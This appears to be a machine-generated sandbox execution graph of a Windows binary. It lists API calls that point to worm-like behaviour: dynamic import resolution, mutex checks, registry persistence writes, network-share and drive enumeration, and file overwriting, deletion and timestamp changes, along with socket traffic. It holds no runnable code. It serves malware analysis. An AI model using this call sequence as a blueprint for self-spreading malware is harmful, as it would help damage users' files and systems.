                                                                                                            execution_graph 9519 97f013 9522 97d3ac 9519->9522 9523 97d440 9522->9523 9525 97d765 9523->9525 9533 97d778 __common_dcos_data 9525->9533 9543 97d78b LoadLibraryExA 9525->9543 9527 97d9c0 __common_dcos_data 7 API calls 9528 97d83c 9527->9528 9553 97d9c5 9528->9553 9529 97d7cf GetModuleFileNameA 9535 97d9a0 Sleep 9529->9535 9536 97d93f LoadLibraryExA GetProcAddress 9529->9536 9532 97d896 MapViewOfFile 9532->9529 9533->9529 9544 97d9c0 9533->9544 9537 97d9ab ExitProcess 9535->9537 9536->9535 9539 97d96c CreateMutexA GetLastError 9536->9539 9539->9535 9539->9537 9540 97d803 __common_dcos_data 9542 97d9c0 __common_dcos_data 7 API calls 9540->9542 9542->9543 9543->9527 9545 97d9c4 9544->9545 9546 97d91a GetModuleFileNameA 9544->9546 9545->9540 9548 97d9a0 Sleep 9546->9548 9549 97d93f LoadLibraryExA GetProcAddress 9546->9549 9550 97d9ab ExitProcess 9548->9550 9549->9548 9551 97d96c CreateMutexA GetLastError 9549->9551 9551->9548 9551->9550 9554 97d9c9 9553->9554 9554->9553 9554->9554 9555 97d9cc GetProcAddress 9554->9555 9557 97d853 SetErrorMode CreateFileMappingA CreateFileMappingA 9554->9557 9556 97d9c0 __common_dcos_data 7 API calls 9555->9556 9556->9554 9557->9529 9557->9532 9733 404bc4 fopen 9613 404f4d 9614 404f56 fclose 9613->9614 9734 8f511e 9735 8f512d 9734->9735 9736 8f513a wsprintfA 9735->9736 9742 8f519e 9735->9742 9737 8f5165 RegQueryValueExA 9736->9737 9738 8f51a0 RegQueryValueExA 9736->9738 9741 8f5199 9737->9741 9737->9742 9738->9742 9739 8f5433 RegCloseKey 9740 8f5440 9739->9740 9743 8f6330 32 API calls 9742->9743 9744 8f5403 9742->9744 9743->9744 9744->9739 9744->9740 9745 404bd4 fclose 9313 902c88 9314 902c97 9313->9314 9315 902e04 9314->9315 9316 902ca4 9314->9316 9344 8f44cb InterlockedExchange 9315->9344 9340 8f44cb InterlockedExchange 9316->9340 9319 902e09 9320 902a35 10 API calls 9319->9320 9322 902e24 9319->9322 9320->9322 9321 902ca9 9323 902dff 9321->9323 9341 8f44cb InterlockedExchange 9321->9341 9325 902cf4 9326 902d12 lstrcpy 9325->9326 9327 902a35 10 API calls 9325->9327 9328 902962 InterlockedExchange 9326->9328 9329 902d0f 9327->9329 9330 902d44 9328->9330 9329->9326 9331 902dee lstrcat 9330->9331 9342 8f44cb InterlockedExchange 9330->9342 9331->9323 9333 902d68 9334 902d7a lstrcat 9333->9334 9335 902d8c lstrcat 9333->9335 9334->9335 9343 8f44cb InterlockedExchange 9335->9343 9337 902da3 9338 902db5 lstrcat 9337->9338 9339 902dc7 lstrlen wsprintfA 9337->9339 9338->9339 9339->9331 9340->9321 9341->9325 9342->9333 9343->9337 9344->9319 7576 4012e0 _controlfp __set_app_type __getmainargs 7579 401000 7576->7579 7580 40105c 7579->7580 7581 40101e 7579->7581 7583 401159 exit 7580->7583 7595 401072 7580->7595 7596 40118b 7581->7596 7585 401084 fopen 7588 4010b5 fprintf 7585->7588 7585->7595 7586 401045 printf 7586->7583 7587 401040 7589 40117b exit 7587->7589 7590 40116f fclose 7587->7590 7588->7587 7589->7583 7590->7589 7591 40118b 3 API calls 7591->7595 7592 4010f5 7592->7587 7593 4010fa printf fclose 7594 401133 fprintf 7593->7594 7593->7595 7594->7587 7595->7580 7595->7585 7595->7591 7595->7592 7595->7593 7600 401195 7596->7600 7597 40119f fread 7598 4011d3 ferror 7597->7598 7597->7600 7599 4011e7 fprintf 7598->7599 7602 40102e 7598->7602 7601 401245 7599->7601 7600->7597 7601->7602 7602->7586 7602->7587 9345 901ab1 9346 901a5a 9345->9346 9347 901acf 9346->9347 9349 901c8d Sleep 9346->9349 9352 901c9d GlobalFree WNetCloseEnum 9346->9352 9358 901a79 WNetEnumResourceA 9346->9358 9348 901c77 9347->9348 9350 901c51 9347->9350 9351 901b14 lstrcpy lstrcat 9347->9351 9349->9346 9354 90195d 121 API calls 9350->9354 9353 900b9a 7 API calls 9351->9353 9357 901ccd 9352->9357 9355 901b47 9353->9355 9356 901c69 Sleep 9354->9356 9355->9350 9360 901be3 9355->9360 9361 901b6b lstrcpy lstrlen 9355->9361 9356->9348 9358->9346 9359 901c7e GetLastError 9358->9359 9359->9349 9362 901c8b 9359->9362 9363 901c38 9360->9363 9368 901c0f lstrlen 9360->9368 9364 901b96 lstrcat 9361->9364 9365 901ba8 lstrlen 9361->9365 9362->9352 9363->9350 9366 901c44 DeleteFileA 9363->9366 9364->9365 9367 8fa16b 2 API calls 9365->9367 9366->9350 9369 901bc2 lstrcat 9367->9369 9370 901060 91 API calls 9368->9370 9371 900c4b 5 API calls 9369->9371 9370->9363 9371->9360 9560 8fb22e 9569 8f44cb InterlockedExchange 9560->9569 9562 8fb366 9570 8f44cb InterlockedExchange 9562->9570 9564 8fb37b 9565 8fb38d GetTickCount 9564->9565 9566 8fb39c 9564->9566 9565->9566 9567 8fc76b 2 API calls 9566->9567 9568 8fb3b7 9567->9568 9569->9562 9570->9564 9746 404be4 fread 9616 404f65 ferror 9571 903238 9587 9031f9 9571->9587 9572 903734 Sleep 9572->9587 9573 903278 GetDriveTypeA 9574 9032bc lstrcat CreateFileA 9573->9574 9573->9587 9577 903522 GetFileAttributesA 9574->9577 9578 9032ff GetFileTime FileTimeToSystemTime 9574->9578 9575 903744 RtlExitUserThread 9580 903569 CreateFileA 9577->9580 9581 90353e SetFileAttributesA DeleteFileA 9577->9581 9582 903515 CloseHandle 9578->9582 9583 90333d 9578->9583 9579 902ebc 11 API calls 9584 90320b Sleep GetLogicalDrives 9579->9584 9586 903598 GetSystemTime SystemTimeToFileTime 9580->9586 9580->9587 9600 8fa2ad SHFileOperation RemoveDirectoryA 9581->9600 9582->9577 9583->9582 9589 903372 ReadFile CharLowerA lstrlen 9583->9589 9597 903465 lstrcpy GetFileAttributesA 9583->9597 9584->9587 9588 8fa16b 2 API calls 9586->9588 9587->9572 9587->9573 9587->9575 9587->9579 9587->9580 9591 903605 9588->9591 9589->9583 9592 903633 lstrcat 9591->9592 9593 90361f lstrcat 9591->9593 9594 902b8e 18 API calls 9591->9594 9601 8f44cb InterlockedExchange 9591->9601 9592->9591 9593->9591 9595 903658 6 API calls 9594->9595 9595->9587 9596 9036ef WriteFile CloseHandle SetFileAttributesA 9595->9596 9596->9587 9597->9583 9598 903491 CloseHandle CreateFileA 9597->9598 9598->9583 9599 9034c9 WriteFile CloseHandle SetFileAttributesA 9598->9599 9599->9583 9600->9587 9601->9591 9372 9024a1 9373 9024ab 9372->9373 9374 9024b4 CloseHandle 9373->9374 9375 9024cb 9373->9375 9374->9375 9376 9024e1 9375->9376 9377 9024d4 CloseHandle 9375->9377 9378 902500 9376->9378 9379 9024ea GetProcessHeap HeapFree 9376->9379 9377->9376 9379->9378 9380 9014a1 9381 9014ab 9380->9381 9382 9014b1 FindClose 9381->9382 9383 9014bb Sleep 9381->9383 9382->9383 9384 9014c8 9383->9384 9385 8f90ba CreateFileA 9386 8f90f4 WriteFile CloseHandle 9385->9386 9387 8f90f2 9385->9387 9386->9387 9749 8f4f36 9750 8f4f45 9749->9750 9751 8f5085 RegCloseKey 9750->9751 9752 8f4f52 wsprintfA 9750->9752 9763 8f50d2 9751->9763 9753 8f4f9c 9752->9753 9754 8f4fa9 9752->9754 9753->9754 9755 8f5007 9753->9755 9756 8f4fe5 9753->9756 9757 8f5215 9753->9757 9758 8f5053 lstrlen RegSetValueExA 9754->9758 9759 8f5030 RegSetValueExA 9754->9759 9761 8f4a5b 2 API calls 9755->9761 9760 8f4a5b 2 API calls 9756->9760 9769 8f6330 32 API calls 9757->9769 9770 8f5403 9757->9770 9762 8f5080 9758->9762 9759->9762 9764 8f4ff4 lstrcpy 9760->9764 9765 8f5016 lstrcpy 9761->9765 9766 8f50f9 GlobalFree 9763->9766 9767 8f5106 9763->9767 9764->9754 9765->9754 9766->9767 9768 8f5433 RegCloseKey 9768->9767 9769->9770 9770->9767 9770->9768 9395 8f44b1 9398 8f44bb GetTickCount 9395->9398 9397 8f44b9 9398->9397 9618 8f7fca 9621 8f7fd3 9618->9621 9619 8f80e4 9620 8f80e6 recv 9620->9619 9621->9619 9621->9620 9622 8f809c select 9621->9622 9622->9619 9622->9620 9399 8f8ec9 9401 8f8ee2 9399->9401 9400 8f8f47 9401->9400 9402 8f8f2f lstrcpyn 9401->9402 9402->9400 9623 8fb3c9 9624 8fb3db 9623->9624 9626 8fb3d3 9623->9626 9625 8f4503 InterlockedExchange 9624->9625 9625->9626 9773 404587 WideCharToMultiByte 9774 4045c4 9773->9774 9775 97eb5f 9776 97eb65 _controlfp 9775->9776 9777 97eb90 9776->9777 9778 97ec57 __common_dcos_data 3 API calls 9777->9778 9779 97ebae 9778->9779 9780 97e87f __common_dcos_data 5 API calls 9779->9780 9781 97ebc2 exit 9780->9781 9627 8f8dc4 9628 8f8dce RtlExitUserThread 9627->9628 9403 97eed8 _controlfp 9404 97ef09 9403->9404 9408 97efd0 9404->9408 9406 97ef27 __common_dcos_data 9407 97ef3b exit 9406->9407 9409 97ef9c 9408->9409 9410 97efa0 fclose 9408->9410 9409->9410 9411 97ef63 9409->9411 9411->9406 9629 9033df 9635 90333d 9629->9635 9630 903515 CloseHandle 9631 903522 GetFileAttributesA 9630->9631 9632 903569 CreateFileA 9631->9632 9633 90353e SetFileAttributesA DeleteFileA 9631->9633 9637 903598 GetSystemTime SystemTimeToFileTime 9632->9637 9639 9031f9 9632->9639 9658 8fa2ad SHFileOperation RemoveDirectoryA 9633->9658 9634 903465 lstrcpy GetFileAttributesA 9634->9635 9638 903491 CloseHandle CreateFileA 9634->9638 9635->9630 9635->9634 9657 903372 ReadFile CharLowerA lstrlen 9635->9657 9640 8fa16b 2 API calls 9637->9640 9638->9635 9641 9034c9 WriteFile CloseHandle SetFileAttributesA 9638->9641 9639->9632 9642 903734 Sleep 9639->9642 9644 903744 RtlExitUserThread 9639->9644 9648 902ebc 11 API calls 9639->9648 9653 903278 GetDriveTypeA 9639->9653 9649 903605 9640->9649 9641->9635 9642->9639 9646 903633 lstrcat 9646->9649 9647 90361f lstrcat 9647->9649 9650 90320b Sleep GetLogicalDrives 9648->9650 9649->9646 9649->9647 9651 902b8e 18 API calls 9649->9651 9659 8f44cb InterlockedExchange 9649->9659 9650->9639 9652 903658 6 API calls 9651->9652 9652->9639 9654 9036ef WriteFile CloseHandle SetFileAttributesA 9652->9654 9653->9639 9655 9032bc lstrcat CreateFileA 9653->9655 9654->9639 9655->9631 9656 9032ff GetFileTime FileTimeToSystemTime 9655->9656 9656->9630 9656->9635 9657->9635 9658->9639 9659->9649 9660 404b15 9661 404b1b _controlfp 9660->9661 9662 404b46 9661->9662 9667 404c0d 9662->9667 9666 404b78 exit 9668 404ef9 exit 9667->9668 9670 404e94 9667->9670 9669 404b64 9668->9669 9673 404835 9669->9673 9670->9668 9670->9669 9672 404edd __common_dcos_data 9670->9672 9681 404f86 9670->9681 9672->9668 9674 404a4f 9673->9674 9675 404b1b _controlfp 9674->9675 9676 404b46 9674->9676 9675->9676 9677 404c0d __common_dcos_data 2 API calls 9676->9677 9678 404b64 9677->9678 9679 404835 __common_dcos_data 2 API calls 9678->9679 9680 404b78 exit 9679->9680 9680->9666 9682 404f56 fclose 9681->9682 9683 404f52 9681->9683 9683->9682 9684 404f19 9683->9684 9684->9672 9603 97d440 9604 97d765 __common_dcos_data 20 API calls 9603->9604 9256 987ac0 9257 987ad8 9256->9257 9258 987bf2 LoadLibraryA 9257->9258 9263 987c37 VirtualProtect VirtualProtect 9257->9263 9259 987c09 9258->9259 9259->9257 9262 987c1b GetProcAddress 9259->9262 9261 987c9c 9261->9261 9262->9259 9264 987c31 ExitProcess 9262->9264 9263->9261 9412 8ff8d6 9413 8ff8e5 9412->9413 9414 8ff925 9413->9414 9415 8fcd03 2 API calls 9413->9415 9416 8ff9a1 9414->9416 9418 8fcd03 2 API calls 9414->9418 9415->9414 9417 8ff9f8 9416->9417 9419 8fcd03 2 API calls 9416->9419 9471 8f44cb InterlockedExchange 9417->9471 9418->9416 9419->9417 9421 8ffa0e 9422 8ffa55 9421->9422 9472 8f44cb InterlockedExchange 9421->9472 9473 8f44cb InterlockedExchange 9422->9473 9425 8ffa82 9426 8fcd03 2 API calls 9425->9426 9427 8ffad5 9425->9427 9426->9427 9428 8fcd03 2 API calls 9427->9428 9429 8ffb50 9427->9429 9428->9429 9430 8fc76b 2 API calls 9429->9430 9433 8ffb9e 9429->9433 9430->9433 9431 8ffc7e 9474 8f44cb InterlockedExchange 9431->9474 9433->9431 9434 8fcd03 2 API calls 9433->9434 9434->9431 9435 8ffc94 9436 8ffd1f 9435->9436 9437 8ffd5c 9435->9437 9440 8fcd03 2 API calls 9435->9440 9438 8fb3ef InterlockedExchange 9436->9438 9439 8fd34d 2 API calls 9437->9439 9443 8ffdea 9437->9443 9438->9437 9441 8ffe63 9439->9441 9440->9436 9441->9443 9450 8fc89a 2 API calls 9441->9450 9442 9007db CloseHandle 9444 9007f5 SetFilePointer SetEndOfFile 9442->9444 9445 90088b CloseHandle SetFileAttributesA 9442->9445 9443->9442 9455 9007d1 UnmapViewOfFile 9443->9455 9456 900793 GlobalAlloc 9443->9456 9457 9005ed 9443->9457 9446 900852 9444->9446 9447 90082b 9444->9447 9448 9008b5 DeleteFileA 9445->9448 9449 9008af 9445->9449 9452 900858 GlobalFree 9446->9452 9453 900869 SetFileTime 9446->9453 9447->9446 9451 900831 WriteFile 9447->9451 9454 9008bf 9448->9454 9449->9448 9449->9454 9463 8ffe88 9450->9463 9451->9446 9452->9453 9453->9445 9458 9008de GlobalFree 9454->9458 9459 9008ef RtlLeaveCriticalSection 9454->9459 9455->9442 9456->9457 9457->9455 9458->9459 9460 900915 9459->9460 9461 90090a Sleep 9459->9461 9461->9460 9462 8f6981 InterlockedExchange 9464 9003c7 9462->9464 9463->9443 9463->9462 9475 8f44cb InterlockedExchange 9464->9475 9466 9004ed GetTickCount 9466->9443 9467 90051a 9466->9467 9476 8f44cb InterlockedExchange 9467->9476 9469 90051f 9469->9443 9477 8f44cb InterlockedExchange 9469->9477 9471->9421 9472->9421 9473->9425 9474->9435 9475->9466 9476->9469 9477->9469 9265 40371b 9272 40372e 9265->9272 9287 403741 LoadLibraryExA 9265->9287 9270 403785 GetModuleFileNameA 9278 4038f5 LoadLibraryExA GetProcAddress 9270->9278 9279 403956 Sleep 9270->9279 9272->9270 9281 403976 7 API calls 9272->9281 9273 403886 CreateThread 9277 4038ac Sleep 9273->9277 9302 403de7 9273->9302 9274 40384c MapViewOfFile 9274->9273 9276 403862 9274->9276 9276->9273 9277->9270 9278->9279 9283 403922 CreateMutexA GetLastError 9278->9283 9280 403961 ExitProcess 9279->9280 9284 4037b9 9281->9284 9283->9279 9283->9280 9286 403976 7 API calls 9284->9286 9286->9287 9288 403976 9287->9288 9289 4037f2 9288->9289 9290 4038d0 GetModuleFileNameA 9288->9290 9297 40397b 9289->9297 9292 4038f5 LoadLibraryExA GetProcAddress 9290->9292 9293 403956 Sleep 9290->9293 9292->9293 9295 403922 CreateMutexA GetLastError 9292->9295 9294 403961 ExitProcess 9293->9294 9295->9293 9295->9294 9298 40397f 9297->9298 9298->9297 9298->9298 9299 403982 GetProcAddress 9298->9299 9301 403809 SetErrorMode CreateFileMappingA CreateFileMappingA 9298->9301 9300 403976 7 API calls 9299->9300 9300->9298 9301->9273 9301->9274 9303 403ef6 CreateMutexA 9302->9303 9307 403dfb 9302->9307 9303->9307 9304 403f2c 9305 404194 9304->9305 9306 403f63 VirtualAlloc 9304->9306 9306->9305 9310 403fbe 9306->9310 9307->9303 9307->9304 9308 40412b LoadLibraryExA 9308->9305 9308->9310 9310->9305 9310->9308 9311 4041c0 KiUserExceptionDispatcher 9310->9311 9312 4041d3 9311->9312 9312->9310 9478 9008ce 9479 9008d8 9478->9479 9480 9008de GlobalFree 9479->9480 9481 9008ef RtlLeaveCriticalSection 9479->9481 9480->9481 9482 900915 9481->9482 9483 90090a Sleep 9481->9483 9483->9482 9605 8f5a6a 9606 8f5a82 9605->9606 9609 8f5ad0 wsprintfA RegQueryValueExA 9606->9609 9610 8f5b37 9606->9610 9607 8f5bf4 RegCloseKey 9608 8f5c01 9607->9608 9609->9610 9610->9607 9610->9608 9484 8f58e9 9489 8f5901 9484->9489 9485 8f5bf4 RegCloseKey 9486 8f5c01 9485->9486 9487 8f5962 wsprintfA 9488 8f5a01 RegSetValueExA 9487->9488 9487->9489 9488->9489 9489->9487 9489->9488 9490 8f5935 9489->9490 9490->9485 9490->9486 9685 8fd1e4 9686 8fd1f4 9685->9686 9687 8fd346 9686->9687 9688 8fd20e 9686->9688 9698 8f44cb InterlockedExchange 9686->9698 9699 8f44cb InterlockedExchange 9688->9699 9691 8fd232 9693 8fd273 9691->9693 9700 8f44cb InterlockedExchange 9691->9700 9692 8fc76b 2 API calls 9694 8fd298 9692->9694 9693->9692 9693->9694 9696 8fb3ef InterlockedExchange 9694->9696 9697 8fd336 9696->9697 9698->9688 9699->9691 9700->9693 9701 8f4bf9 9702 8f4c08 9701->9702 9703 8f4d68 RegCloseKey 9702->9703 9704 8f4c15 wsprintfA 9702->9704 9706 8f4d75 9703->9706 9705 8f4c60 9704->9705 9709 8f4c6d 9704->9709 9705->9709 9710 8f4cbc 9705->9710 9711 8f4ce5 9705->9711 9707 8f4d36 lstrlen RegSetValueExA 9714 8f4d63 9707->9714 9708 8f4d13 RegSetValueExA 9708->9714 9709->9707 9709->9708 9712 8f4a5b 2 API calls 9710->9712 9713 8f4a5b 2 API calls 9711->9713 9715 8f4cd2 lstrcpy 9712->9715 9716 8f4cf9 lstrcpy 9713->9716 9715->9709 9716->9709 7603 904567 SetErrorMode WSAStartup RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 7626 903b60 7603->7626 7607 9045de CreateThread 7608 8f41c6 3 API calls 7607->7608 7927 8f9eea 7607->7927 7609 904605 CreateThread 7608->7609 7610 8f41c6 3 API calls 7609->7610 7901 90392d 7609->7901 7611 90462c CreateThread 7610->7611 7612 8f41c6 3 API calls 7611->7612 7881 8f8962 Sleep 7611->7881 7613 904653 CreateThread 7612->7613 7614 8f41c6 3 API calls 7613->7614 7863 8fa2f5 7613->7863 7615 90467a CreateThread 7614->7615 7616 8f41c6 3 API calls 7615->7616 7857 8f426a 7615->7857 7617 9046a1 CreateThread 7616->7617 7618 8f41c6 3 API calls 7617->7618 8006 8f7a3a 7617->8006 7619 9046c8 CreateThread 7618->7619 7620 8f41c6 3 API calls 7619->7620 7994 8f83c9 socket 7619->7994 7621 9046ef CreateThread 7620->7621 7622 8f41c6 3 API calls 7621->7622 7981 8f878b Sleep 7621->7981 7623 904716 7622->7623 7624 904722 Sleep 7623->7624 7625 90472f 7623->7625 7624->7623 7627 903b8a 7626->7627 7701 902ebc RegOpenKeyExA 7627->7701 7630 903c72 LoadLibraryA 7632 903cf1 RegOpenKeyExA 7630->7632 7633 903c8e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7630->7633 7631 903c28 GetProcAddress GetProcAddress GetProcAddress 7631->7630 7634 903d15 RegSetValueExA RegCloseKey 7632->7634 7635 903d4d RegOpenKeyExA 7632->7635 7633->7632 7634->7635 7636 903d71 RegSetValueExA RegCloseKey 7635->7636 7637 903da9 lstrcpy lstrcat RegOpenKeyExA 7635->7637 7636->7637 7638 903df4 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 7637->7638 7639 903e5f RegOpenKeyExA 7637->7639 7638->7639 7640 903f15 GetWindowsDirectoryA lstrlen 7639->7640 7641 903e87 RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 7639->7641 7642 903f4c GetComputerNameA lstrlen 7640->7642 7643 903f3c lstrcat 7640->7643 7641->7640 7644 903fc9 lstrcpy GetUserNameA lstrlen 7642->7644 7645 903f7c lstrlen 7642->7645 7643->7642 7646 904009 lstrcpy 7644->7646 7649 90401d 7644->7649 7645->7644 7646->7649 7647 90404e lstrlen 7648 9040e1 7647->7648 7647->7649 7709 900b9a lstrcpy GetTickCount lstrlen wsprintfA CreateFileA 7648->7709 7649->7647 7649->7648 7651 9040aa lstrlen 7649->7651 7651->7649 7653 9040f2 GetTempPathA lstrlen 7655 904129 7653->7655 7656 904119 lstrcat 7653->7656 7654 90414d lstrcpy 7661 90414b 7654->7661 7658 900b9a 7 API calls 7655->7658 7656->7655 7657 904178 lstrlen 7659 904205 lstrcat CreateFileMappingA 7657->7659 7657->7661 7660 904133 7658->7660 7662 90423a 7659->7662 7660->7661 7663 90413a lstrcpy 7660->7663 7661->7657 7661->7659 7664 9041db lstrlen 7661->7664 7712 8f6274 CreateFileMappingA 7662->7712 7663->7661 7664->7661 7668 904246 7669 904331 7668->7669 7670 904256 7668->7670 7672 8f5760 10 API calls 7669->7672 7732 8fc89a 7670->7732 7674 90432c 7672->7674 7673 90431e 7676 8f5760 10 API calls 7673->7676 7738 8f4d96 7674->7738 7675 90428e 7675->7673 7678 90429d 7675->7678 7676->7674 7678->7675 7789 8f5e86 7678->7789 7679 90434a 7772 8f55be CreateFileA 7679->7772 7683 904361 7783 8fa553 GetTickCount GetPrivateProfileStringA lstrlen 7683->7783 7684 904366 7686 904397 7684->7686 7690 9043c6 7684->7690 7795 8f44cb InterlockedExchange 7686->7795 7688 90439c GetTickCount wsprintfA 7688->7690 7689 9044aa lstrcat GetSystemDirectoryA lstrlen 7691 9044f5 lstrcat lstrcat GlobalAlloc GlobalAlloc 7689->7691 7692 9044e5 lstrcat 7689->7692 7690->7689 7694 904461 lstrlen wsprintfA 7690->7694 7693 904556 CreateThread 7691->7693 7692->7691 7696 8f41c6 RtlEnterCriticalSection 7693->7696 7972 9027d4 GlobalAlloc 7693->7972 7694->7690 7695 9044a3 7694->7695 7695->7689 7697 8f4229 7696->7697 7700 8f41e2 7696->7700 7698 8f425b RtlLeaveCriticalSection 7697->7698 7699 8f423c CloseHandle 7697->7699 7698->7607 7699->7698 7700->7698 7702 902f0d RegSetValueExA RegCloseKey 7701->7702 7706 902f44 7701->7706 7702->7706 7703 902f8b lstrcpy lstrcat 7708 902fbe 7703->7708 7705 902ffa LoadLibraryA 7705->7630 7705->7631 7706->7703 7796 902e32 RegOpenKeyExA 7706->7796 7707 902e32 6 API calls 7707->7708 7708->7705 7708->7707 7710 900c23 CloseHandle DeleteFileA 7709->7710 7711 900c44 7709->7711 7710->7711 7711->7653 7711->7654 7713 8f62bc MapViewOfFile 7712->7713 7714 8f62d9 7712->7714 7713->7714 7715 8f5760 7714->7715 7716 8f57ec 7715->7716 7717 8f57e3 7715->7717 7716->7668 7717->7716 7718 8f57f1 lstrcpy RegOpenKeyExA 7717->7718 7719 8f5827 7718->7719 7720 8f5854 7718->7720 7719->7716 7721 8f5832 RegCreateKeyA 7719->7721 7722 8f5a4b 7720->7722 7724 8f585e 7720->7724 7721->7716 7721->7720 7727 8f5ad0 wsprintfA RegQueryValueExA 7722->7727 7728 8f5935 7722->7728 7723 8f5872 RegEnumValueA 7723->7724 7731 8f58ab 7723->7731 7724->7723 7725 8f58ad RegDeleteValueA 7724->7725 7724->7731 7725->7723 7726 8f5bf4 RegCloseKey 7726->7716 7727->7728 7728->7716 7728->7726 7729 8f5962 wsprintfA 7730 8f5a01 RegSetValueExA 7729->7730 7729->7731 7730->7731 7731->7728 7731->7729 7731->7730 7733 8fc8b7 7732->7733 7734 8fc906 7732->7734 7733->7734 7735 8fc8c0 MapViewOfFile 7733->7735 7734->7675 7735->7734 7736 8fc8e0 7735->7736 7737 8fc8f2 UnmapViewOfFile 7736->7737 7737->7734 7739 8f4dc0 7738->7739 7740 8f4e41 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7739->7740 7750 8f4e3c 7739->7750 7741 8f4eb7 RegCreateKeyA 7740->7741 7742 8f5112 7740->7742 7743 8f4ee0 GlobalAlloc 7741->7743 7741->7750 7745 8f513a wsprintfA 7742->7745 7769 8f519e 7742->7769 7744 8fc89a 2 API calls 7743->7744 7746 8f4eff 7744->7746 7747 8f5165 RegQueryValueExA 7745->7747 7748 8f51a0 RegQueryValueExA 7745->7748 7751 8f4f1a 7746->7751 7801 8f6330 7746->7801 7752 8f5199 7747->7752 7747->7769 7748->7769 7749 8f5433 RegCloseKey 7749->7750 7750->7679 7755 8f5085 RegCloseKey 7751->7755 7756 8f4f52 wsprintfA 7751->7756 7757 8f50d2 7751->7757 7752->7679 7754 8f50f9 GlobalFree 7754->7750 7755->7757 7758 8f4f9c 7756->7758 7759 8f4fa9 7756->7759 7757->7750 7757->7754 7758->7759 7760 8f5007 7758->7760 7761 8f4fe5 7758->7761 7758->7769 7762 8f5053 lstrlen RegSetValueExA 7759->7762 7763 8f5030 RegSetValueExA 7759->7763 7765 8f4a5b 2 API calls 7760->7765 7825 8f4a5b 7761->7825 7766 8f5080 7762->7766 7763->7766 7768 8f5016 lstrcpy 7765->7768 7766->7679 7768->7759 7770 8f6330 32 API calls 7769->7770 7771 8f5403 7769->7771 7770->7771 7771->7749 7771->7750 7773 8f572b 7772->7773 7774 8f5650 GetFileSize 7772->7774 7777 8f6330 32 API calls 7773->7777 7781 8f5742 7773->7781 7775 8f571e CloseHandle 7774->7775 7776 8f5672 7774->7776 7775->7773 7776->7775 7780 8f5682 GlobalAlloc ReadFile lstrcpy lstrlen 7776->7780 7777->7781 7778 8f574e GlobalFree 7779 8f575b lstrlen 7778->7779 7779->7683 7779->7684 7782 8f56f4 7780->7782 7781->7778 7781->7779 7782->7775 7784 8fa660 lstrcpy 7783->7784 7785 8fa5e0 GetTickCount 7783->7785 7784->7684 7786 8fa5ff 7785->7786 7856 8f44cb InterlockedExchange 7786->7856 7788 8fa613 wsprintfA WritePrivateProfileStringA 7788->7784 7790 8f5eb2 7789->7790 7792 8f5ebb 7789->7792 7791 8f5f2b GetTickCount 7790->7791 7790->7792 7793 8f5f0f 7790->7793 7791->7793 7792->7678 7793->7792 7794 8f6056 GetTickCount 7793->7794 7794->7792 7795->7688 7797 902e80 RegCreateKeyA 7796->7797 7798 902e5c RegSetValueExA RegCloseKey 7796->7798 7799 902eb8 7797->7799 7800 902e96 RegSetValueExA RegCloseKey 7797->7800 7798->7799 7799->7706 7800->7799 7829 908060 7801->7829 7804 8f672a 7805 8f695b RtlLeaveCriticalSection 7804->7805 7806 8f6734 IsBadWritePtr 7804->7806 7807 8f697c 7805->7807 7806->7805 7808 8f674f 7806->7808 7807->7751 7808->7805 7809 8f678e wsprintfA lstrlen 7808->7809 7810 8f67ca 7809->7810 7810->7805 7811 8f6868 GlobalFree 7810->7811 7812 8f6875 GlobalAlloc 7810->7812 7811->7812 7813 8f68a7 7812->7813 7814 8f68bf GlobalAlloc wsprintfA lstrlen 7813->7814 7815 8f68b3 GlobalFree 7813->7815 7818 8f6914 7814->7818 7815->7814 7816 8f63dd 7817 8f6412 7816->7817 7819 8f6698 7816->7819 7821 8f6623 lstrcpy 7816->7821 7851 8f54a2 CreateFileA 7818->7851 7820 8f66a1 7819->7820 7831 8f4af0 7819->7831 7820->7805 7821->7816 7828 8f4a68 7825->7828 7826 8f4ae5 lstrcpy 7826->7759 7827 8f4ab2 lstrlen wsprintfA 7827->7828 7828->7826 7828->7827 7830 8f633d RtlEnterCriticalSection 7829->7830 7830->7804 7830->7816 7832 8f4afd 7831->7832 7833 8f4b5b 7832->7833 7834 8f4b60 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7832->7834 7833->7820 7835 8f4bcb RegCreateKeyA 7834->7835 7837 8f4bed 7834->7837 7836 8f4be8 7835->7836 7835->7837 7836->7833 7838 8f4d68 RegCloseKey 7837->7838 7839 8f4c15 wsprintfA 7837->7839 7838->7833 7840 8f4c6d 7839->7840 7841 8f4c60 7839->7841 7842 8f4d36 lstrlen RegSetValueExA 7840->7842 7843 8f4d13 RegSetValueExA 7840->7843 7841->7840 7844 8f4cbc 7841->7844 7845 8f4ce5 7841->7845 7848 8f4d63 7842->7848 7843->7848 7846 8f4a5b 2 API calls 7844->7846 7847 8f4a5b 2 API calls 7845->7847 7849 8f4cd2 lstrcpy 7846->7849 7850 8f4cf9 lstrcpy 7847->7850 7848->7820 7849->7840 7850->7840 7852 8f55b9 7851->7852 7853 8f5520 lstrcpy lstrlen 7851->7853 7852->7805 7854 8f5561 7853->7854 7855 8f557b WriteFile SetEndOfFile CloseHandle 7854->7855 7855->7852 7856->7788 7860 8f4275 7857->7860 7858 8f42dc RtlExitUserThread 7859 8f42cf Sleep 7859->7860 7860->7858 7860->7859 7861 8f42a6 WaitForSingleObject 7860->7861 7862 8f41c6 3 API calls 7860->7862 7861->7860 7862->7860 8020 8f44cb InterlockedExchange 7863->8020 7865 8fa360 Sleep GetTempPathA lstrlen 7866 8fa3b8 7865->7866 7867 8fa3a6 lstrcat 7865->7867 7868 8fa3c5 lstrlen lstrcpy lstrcat 7866->7868 7869 8fa542 RtlExitUserThread 7866->7869 7870 8fa411 FindFirstFileA 7866->7870 7872 8fa525 FindClose 7866->7872 7873 8fa532 Sleep 7866->7873 7867->7866 7868->7866 7870->7866 7871 8fa43b FindNextFileA 7870->7871 7871->7866 7874 8fa457 lstrcat lstrlen lstrlen 7871->7874 7872->7873 7873->7866 7875 8fa49e lstrcmpiA 7874->7875 7879 8fa4b9 7874->7879 7875->7879 7876 8fa50c Sleep 7876->7871 7878 8fa4e3 lstrcmpiA 7878->7876 7878->7879 7879->7876 7879->7878 8021 8fa26e 7879->8021 8027 8fa2ad SHFileOperation RemoveDirectoryA 7879->8027 8618 8f44cb InterlockedExchange 